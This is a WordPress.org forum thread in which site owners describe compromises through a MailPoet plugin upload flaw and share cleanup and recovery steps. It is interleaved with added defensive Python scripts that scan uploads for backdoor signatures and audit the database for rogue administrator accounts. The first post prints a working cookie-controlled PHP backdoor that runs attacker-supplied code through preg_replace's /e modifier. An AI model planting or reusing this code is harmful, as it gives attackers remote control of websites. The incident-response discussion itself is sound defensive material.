WordPress.org

Forums

MailPoet Newsletters
[resolved] Plugin Hacked (24 posts)

  1. webmistress666
    Member
    Posted 9 months ago #

    2.6.8 - 2014-07-04

    Fixed security issue reported by Dominic

Well, I'm hoping this was the culprit, but regardless, our site was compromised via MailPoet last week. There was a backdoor being used to send out massive amounts of spam and our webhost had to shut it down.

    Files were found in:

    wp-content/upgrade/
    wp-content/uploads/ (a file called ajax.php)
    wp-content/uploads/wysija/themes/main/
    wp-content/uploads/wysija/themes/main2/

    These were always .php files, sometimes with a gibberish name, other times with a name like "ajax.php" or "index.php" where there shouldn't have been one (in the themes folders).

    The index.php file inside the "wysija/themes/main/" folders looked like this:

<?php
/**
 * @package     Joomla.Plugin.System
 * @since       1.5
 *
 *
 */
// Dressed up as a Joomla system plugin; it is a cookie-controlled backdoor.
class PlgSysJoomla {
public function __construct() {
// Cookie ljNqe3 carries the name of a decoding function (likely base64_decode).
// Without it the file just prints phpinfo(), which lets the attacker confirm
// the backdoor is still alive.
$file=@$_COOKIE['ljNqe3'];
// ljNqe2 decodes to a function name (the "/292/e" arguments only make sense for
// preg_replace) and ljNqe1 decodes to PHP source. The /e modifier makes
// preg_replace eval() the replacement string, so any request carrying the three
// cookies runs arbitrary attacker code; nothing has to be stored on disk.
if ($file){ $opt=$file(@$_COOKIE['ljNqe2']); $au=$file(@$_COOKIE['ljNqe1']); $opt("/292/e",$au,292); die();} else {phpinfo();die;}}}
$index=new PlgSysJoomla;

Anyway, anyone else have these issues? I updated MailPoet, deleted all suspicious files, changed my FTP password, and am hoping that's enough.

    https://wordpress.org/plugins/wysija-newsletters/
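A scan for the kind of files described in this post, as an added example that is not code from the thread or from MailPoet: it walks wp-content/uploads, reports every PHP file found there (the directory should hold none), and searches the contents of every file for the cookie-driven backdoor pattern above and for the generic eval(base64_decode(...)) injection. The sample directory tree, its file contents and the signature regexes are constructed here for illustration; the same function can be pointed at a real wp-content/uploads or wp-content/upgrade.

```python
"""Scan a WordPress uploads tree for PHP files and known backdoor signatures.

Added example, not code from this thread or from MailPoet. Assumes the layout
reported in the post: wp-content/uploads/ (and wysija/themes/* beneath it)
should contain no executable PHP, so every *.php is reported, and every file
is checked for the cookie-driven backdoor and the eval/base64 injection.
"""
import re
import tempfile
from pathlib import Path

PHP_SUFFIXES = {".php", ".phtml", ".php5", ".php7"}

# (label, regex). Deliberately loose: review each hit by hand before deleting.
SIGNATURES = [
    # $file=@$_COOKIE['ljNqe3'];   -> a cookie value later used as a callable
    ("cookie-to-variable", re.compile(r"\$\w+\s*=\s*@?\$_COOKIE\[[^\]]+\]\s*;")),
    # $file(@$_COOKIE['ljNqe2'])   -> variable function applied to a cookie
    ("variable-call-on-cookie", re.compile(r"\$\w+\s*\(\s*@?\$_COOKIE\[")),
    # $opt("/292/e", ...) or preg_replace("/x/e", ...) -> /e modifier eval()s
    ("preg-e-modifier", re.compile(r"(?:preg_replace|\$\w+)\s*\(\s*[\"']/[^\"']*?/[A-Za-z]*e[A-Za-z]*[\"']")),
    # eval(base64_decode(...)), also behind gzinflate/str_rot13 wrappers
    ("eval-base64", re.compile(r"eval\s*\(\s*(?:gzinflate|gzuncompress|str_rot13)?\s*\(?\s*base64_decode\s*\(")),
    ("phpinfo-probe", re.compile(r"\bphpinfo\s*\(\s*\)")),
]


def _line_of(text, index):
    return text.count("\n", 0, index) + 1


def scan_tree(root):
    """Return findings as (path relative to root, label, line number)."""
    root = Path(root)
    findings = []
    for path in sorted(p for p in root.rglob("*") if p.is_file()):
        rel = path.relative_to(root).as_posix()
        text = path.read_text(encoding="utf-8", errors="replace")
        if path.suffix.lower() in PHP_SUFFIXES:
            findings.append((rel, "php-file-under-uploads", 0))
        elif "<?php" in text:
            # a .css/.jpg/... that now carries PHP
            findings.append((rel, "php-tag-in-non-php-file", _line_of(text, text.index("<?php"))))
        # Count every match, not only the first: a file "cleaned" once may
        # still carry a second payload further down.
        for label, pattern in SIGNATURES:
            for m in pattern.finditer(text):
                findings.append((rel, label, _line_of(text, m.start())))
    return findings


# ---- constructed sample data (not real files from the thread) ----
BACKDOOR = """<?php
class PlgSysJoomla {
public function __construct() {
$file=@$_COOKIE['ljNqe3'];
if ($file){ $opt=$file(@$_COOKIE['ljNqe2']); $au=$file(@$_COOKIE['ljNqe1']); $opt("/292/e",$au,292); die();} else {phpinfo();die;}}}
$index=new PlgSysJoomla;
"""
INJECTED = "<?php eval(base64_decode('Li4u')); ?>\n"   # 'Li4u' is just '...'


def build_sample_tree(root):
    """Lay out a constructed uploads tree: clean files plus infected ones."""
    root = Path(root)
    (root / "2014/07").mkdir(parents=True)
    (root / "2014/07/photo.jpg").write_bytes(b"\xff\xd8\xff\xe0 not a real jpeg")
    (root / "2014/07/footer.css").write_text("p{margin:0}\n" + INJECTED)
    (root / "wysija/themes/main").mkdir(parents=True)
    (root / "wysija/themes/main/style.css").write_text("body{margin:0}\n")
    (root / "wysija/themes/main/index.php").write_text(BACKDOOR)
    (root / "wysija/themes/main2").mkdir(parents=True)
    (root / "wysija/themes/main2/index.php").write_text(
        "<?php // Silence is golden.\n" + INJECTED + INJECTED)
    (root / "ajax.php").write_text(INJECTED + "<?php echo 'ajax';\n")


def demo():
    """Build the constructed tree in a temporary directory and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_tree(tmp)
        return scan_tree(tmp)


if __name__ == "__main__":
    for rel, label, line in demo():
        print(f"{label:26} {rel}:{line}")
```

Hits are leads, not verdicts: compare each flagged file's modification time with the date the plugin was updated, and diff anything under wp-content/plugins or wp-includes against a fresh copy from WordPress.org rather than trusting a signature list.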

  2. AddyBean
    Member
    Posted 9 months ago #

    Yes! http://blog.sucuri.net/2014/07/remote-file-upload-vulnerability-on-mailpoet-wysija-newsletters.html

I'm in the process of backing everything up and plan to wipe out the whole WordPress directory and reinstall. I'm not sure if there are added files in there, but many of the existing ones have been modified with an eval and base64 code at the top. It looks like it's managed to get into everything, not just the uploads area.

What I can't figure out is if it could have inserted itself into the database proper, or if it just modified the WordPress directory. I'm hoping a reinstall alone will take care of it. Not sure how to go about checking the database for issues. Been through those links that keep getting posted here every time someone says they've been hacked and still can't find an answer to the db question.

  3. webmistress666
    Member
    Posted 9 months ago #

    Awesome, thanks for the link! We've had our site hacked before, years ago, and it was just like you're describing with the base 64 encode. It was a TOTAL NIGHTMARE. We ended up just exporting all our content via WordPress to an XML file, wiping the installation entirely, installing a new one, and then importing the posts.

    Luckily, that's not happening to us currently. I'm hoping we managed to catch it in time. There were only about 4 suspicious files and nothing was encoded. Still, I'll be sure to keep an eye out for anything fishy.

    Good luck with yours.

  4. dotlizard
    Member
    Posted 9 months ago #

    I cleaned the initial infection, but there were backdoors -- it roamed all through my webserver, with that base64 thing. I spent 8 hours cleaning everything, and it's been clear since. I'm unwilling to do the "export everything then burn it with fire" approach just yet, but if it comes back I might have to.

    I'm kind of bothered that there isn't more information on this at MailPoet's site, at least a knowledge base article on the subject. To acknowledge such a severe vulnerability as a line item on a changelog seems a bit irresponsible, considering they gave hackers console-level access to our servers for four days.

  5. esmi
    Forum Moderator
    Posted 9 months ago #

    What makes you think that the plugin had anything to do with the hack as opposed to simply being a victim of it?

  6. webmistress666
    Member
    Posted 9 months ago #

    Did you read the link AddyBean posted?

    In my case, the first files were uploaded to the wysija/themes directory, which is what tipped me off to it being a hole in the plugin. Logs and security fixes confirmed.

  7. aral.ici
    Member
    Posted 9 months ago #

Hi there, all of my sites with MailPoet have been hacked. I'm pretty sure at least one of them has the latest version, so for now I just deleted the plugin.

  8. aral.ici
    Member
    Posted 9 months ago #

A little update: actually, a file was uploaded to the themes directory on July 5, BEFORE updating MailPoet, and it was only on the night of Thursday the 17th at 23:45 (French time) that the flaw was exploited. So the current version may be clean, but despite updating the plugin, the flaw may persist because of the infected file in wp-content/upload/wysija/themes/*/*.php.

    Sorry for my bad English.

  9. kaostik
    Member
    Posted 9 months ago #

Hi Aral,
has your problem been solved?
I think I was also infected on the night of Thursday to Friday.
I'm French, sorry for the English translation.
Thanks

  10. aral.ici
    Member
    Posted 9 months ago #

    Hi,

Yes, problem solved the hard way:
- reinstalled WP
- reinstalled all plugins
- reinstalled the theme
- verified and corrected manually all files not updated in the process (like wp-config.php)
- checked the database for an admin user created on the sly (I read this on a security forum: several hackers exploited the flaw, so the attacks can vary from site redirection to malware distribution to backdoor creation).

For the record, I manage two sites that had the problem (hosted at OVH; one crashed, the other I detected myself once the source of the infection was known), I was asked for advice on another, and finally for an intervention on a fourth (hosted at 1&1, whose antivirus detected the problem and set all the PHP files to mode 0200).

I think there are many, many undetected infected sites out there... because, as I wrote above in English, even with the plugin up to date, "backdoor" files were uploaded during the window before the flaw was fixed (all in wp-content/upload, apparently).

Good luck!
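One way to do the database check in the last step of this post, as an added example that is not code from the thread or from MailPoet: it lists every account whose wp_capabilities grants administrator and flags the ones that are not on an allow-list, have a blank e-mail or display name, or were registered inside the incident window. The table layout follows WordPress' standard schema with a subset of its columns; the sample rows, the allow-list and the "since" date are constructed for illustration.

```python
"""Audit a WordPress database for administrator accounts the owner did not create.

Added example, not code from this thread or from MailPoet. Assumes the standard
WordPress schema: users live in {prefix}users, and their roles in
{prefix}usermeta under meta_key '{prefix}capabilities' as a PHP-serialized
array such as a:1:{s:13:"administrator";b:1;}. The sample database is built
in-memory with SQLite so the script runs offline; against a real site, pass a
connection from your MySQL driver instead (only the placeholder style differs).
"""
import re
import sqlite3

# s:13:"administrator";b:1;  -> role "administrator" is granted (b:1)
ROLE_RE = re.compile(r's:\d+:"([^"]+)";b:1;')


def roles_from_serialized(value):
    """Extract role names from a PHP-serialized wp_capabilities value."""
    return set(ROLE_RE.findall(value or ""))


def load_users(conn, prefix="wp_"):
    # prefix is the site's table prefix from wp-config.php, never user input
    sql = f"""
        SELECT u.ID, u.user_login, u.user_email, u.display_name,
               u.user_registered, m.meta_value
          FROM {prefix}users u
          LEFT JOIN {prefix}usermeta m
            ON m.user_id = u.ID AND m.meta_key = '{prefix}capabilities'
         ORDER BY u.ID
    """
    return conn.execute(sql).fetchall()


def find_suspect_admins(conn, known_admins, since=None, prefix="wp_"):
    """Return [(login, [reasons])] for every administrator that is not on the
    allow-list, has a blank e-mail or display name, or was registered on or
    after `since` (ISO timestamp, e.g. the start of the incident window)."""
    suspects = []
    for _uid, login, email, name, registered, caps in load_users(conn, prefix):
        if "administrator" not in roles_from_serialized(caps):
            continue
        reasons = []
        if login not in known_admins:
            reasons.append("login not in allow-list")
        if not (email or "").strip() or not (name or "").strip():
            reasons.append("blank e-mail or display name")
        if since and registered >= since:
            reasons.append(f"registered on/after {since}")
        if reasons:
            suspects.append((login, reasons))
    return suspects


def build_sample_db():
    """Constructed sample: one legitimate admin, one subscriber, two rogue admins."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE wp_users (ID INTEGER PRIMARY KEY, user_login TEXT, user_email TEXT,
                               display_name TEXT, user_registered TEXT);
        CREATE TABLE wp_usermeta (umeta_id INTEGER PRIMARY KEY, user_id INTEGER,
                                  meta_key TEXT, meta_value TEXT);
    """)
    conn.executemany("INSERT INTO wp_users VALUES (?,?,?,?,?)", [
        (1, "webmistress", "wm@example.org", "webmistress", "2012-03-01 10:00:00"),
        (2, "bob", "bob@example.org", "Bob", "2013-05-10 09:00:00"),
        (3, "", "", "", "2014-07-18 02:15:00"),             # the "blank" admin
        (4, "support", "it@example.org", "Support", "2014-07-19 01:00:00"),
    ])
    conn.executemany(
        "INSERT INTO wp_usermeta (user_id, meta_key, meta_value) VALUES (?, 'wp_capabilities', ?)", [
            (1, 'a:1:{s:13:"administrator";b:1;}'),
            (2, 'a:1:{s:10:"subscriber";b:1;}'),
            (3, 'a:1:{s:13:"administrator";b:1;}'),
            (4, 'a:1:{s:13:"administrator";b:1;}'),
        ])
    return conn


def demo():
    """Run the audit against the constructed database."""
    return find_suspect_admins(build_sample_db(), known_admins={"webmistress"},
                               since="2014-07-17 00:00:00")


if __name__ == "__main__":
    for login, reasons in demo():
        print(f"{login or '<blank>'}: {', '.join(reasons)}")
```

Role is read from usermeta rather than guessed from the login, because an attacker can give an innocent-looking account full capabilities; the allow-list is what turns "has administrator" into "should have administrator".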

  11. kaostik
    Member
    Posted 9 months ago #

Thanks for your answer.
Thanks for the pointers; I had already reinstalled everything once and was reinfected 48 hours later, with this plugin still active.
I've just removed it, along with the suspicious files that were also in upload.
I'm also hesitating about deleting the plugin's data from my database.
Now I'm waiting to see whether I get infected again.
For info, I'm on OVH and I had a blank page instead of my site; all my PHP files were affected.

  12. aral.ici
    Member
    Posted 9 months ago #

The plugin is supposed to be clean now, so if you were reinfected when you had the latest version, it is probably because one of the "backdoor" files was missed... or the plugin is not that secure...

I don't think you need to delete data in the database, just check that no new suspicious user has been added.

  13. Artemisia1975
    Member
    Posted 9 months ago #

My site and that of a friend of mine were infected after the release of the update, on July 18. The server blocked my site as malicious and promised to put it back online only after deleting the entire site. I have reinstalled WP, reinstalled all plugins, reinstalled the theme...

  14. MailPoet Staff
    Member
    Plugin Author

    Posted 9 months ago #

    Hi guys,

    We're really sorry for that.

We published a guide on our site which can help you recover your sites:

    http://support.mailpoet.com/knowledgebase/site-hacked-what-to-do/

  15. davydov-denis
    Member
    Posted 9 months ago #

There was another hack attack recently; it seems it was not related to MailPoet, as some victims did not have it installed:

    http://blog.sucuri.net/2014/07/malware-infection-breaking-wordpress-sites.html

  16. BrooklynBob
    Member
    Posted 9 months ago #

    My site was hacked AFTER 2.6.8 was installed, and as a result, my host shut my site down this morning (with warning). After speaking with my host's tech support, I decided that the best thing to do is to "nuke and pave" - wipe my directories, remove the database and start with a clean installation of WordPress, my theme and plugins, and hopefully restore my. The other alternative, according to them, was to review all of my files and search for malicious code. Unfortunately, Mailpoet's support solution is vague and doesn't really offer a true solution. So, as a result, I'm looking at many hours of work ahead. Thanks a frigging bunch, Mailpoet.

  17. fwchapman
    Member
    Posted 8 months ago #

    One of my client's sites was compromised by the MailPoet vulnerability, but I had 3 months of weekly backups of the entire site (database, folders, and files). I spent 2 hours investigating the infection to determine when and where it entered and how far it spread. I found rogue code (base64, cookie) inserted into some PHP files, and even some modified CSS files. I spent 1 hour recovering the entire site from the most current uninfected backup. Thankfully, site restoration was simple, straightforward, and painless.

    Malware infections like this one are the reason why it is critical to perform regular backups of your entire site. I use the BackUpWordPress plugin on every site I build. It is easy to set up automatic backups of both the database and the file system. I back up the database automatically every day and the complete file system automatically every week, keeping 3 months of both backups on hand, just in case.

    If you're not already making regular backups of your entire site, I highly recommend BackUpWordPress. You can find it here:

    https://wordpress.org/plugins/backupwordpress/

  18. poddys
    Member
    Posted 8 months ago #

    Great information, we got hacked too, and even though most of our site is not WordPress based, ALL of our PHP files had a malicious script added to the beginning.

    I used a free Windows program "replacetext" to scan and replace the code in over 1,000 PHP files (it also takes backups and gives a log of all changes).

    I found a backdoor in wp-content/upload/wysija/themes/*/*.php. - there was an index.php which had been cleaned, but it also had a second script in the file (crafty!). Now that has been removed also.

    Will update if I find anything else unusual.

  19. poddys
    Member
    Posted 8 months ago #

    @fwchapman I also use backupwordpress. It is an excellent plugin.

  20. wing2go
    Member
    Posted 4 months ago #

Our site was shut down too, and the hosting company cited that this plugin, wysija newsletter, might have been used to stage an attack. I have no idea, but I disabled it anyway. I wanted the plugin owner to comment on it.

  21. MailPoet Staff
    Member
    Plugin Author

    Posted 4 months ago #

    Guys, always keep your MailPoet updated, there's nothing else we can do besides that.

  22. zifawebsolutions
    Member
    Posted 3 months ago #

Got rid of the MailPoet plugin altogether and all related files but my website still won't load. See http://adamsparadise.com/

    I followed the uninstall/removal procedure from mailpoet support page and I'm still stuck. Help please, this is affecting my business.

    Regards,
    Sam
    sam@zifawebsolutions.com

  23. MailPoet Staff
    Member
    Plugin Author

    Posted 3 months ago #

    Your website is loading fine on my end: http://imgur.com/oPkZDf9

    Check the beginning of all your .php files for the malware.

  24. zifawebsolutions
    Member
    Posted 3 months ago #

Hi MailPoet staff,

I've actually restored a backup I made 1 month ago, got rid of your MailPoet plugin and upgraded WordPress to make it work.

    Regards,
    Sam
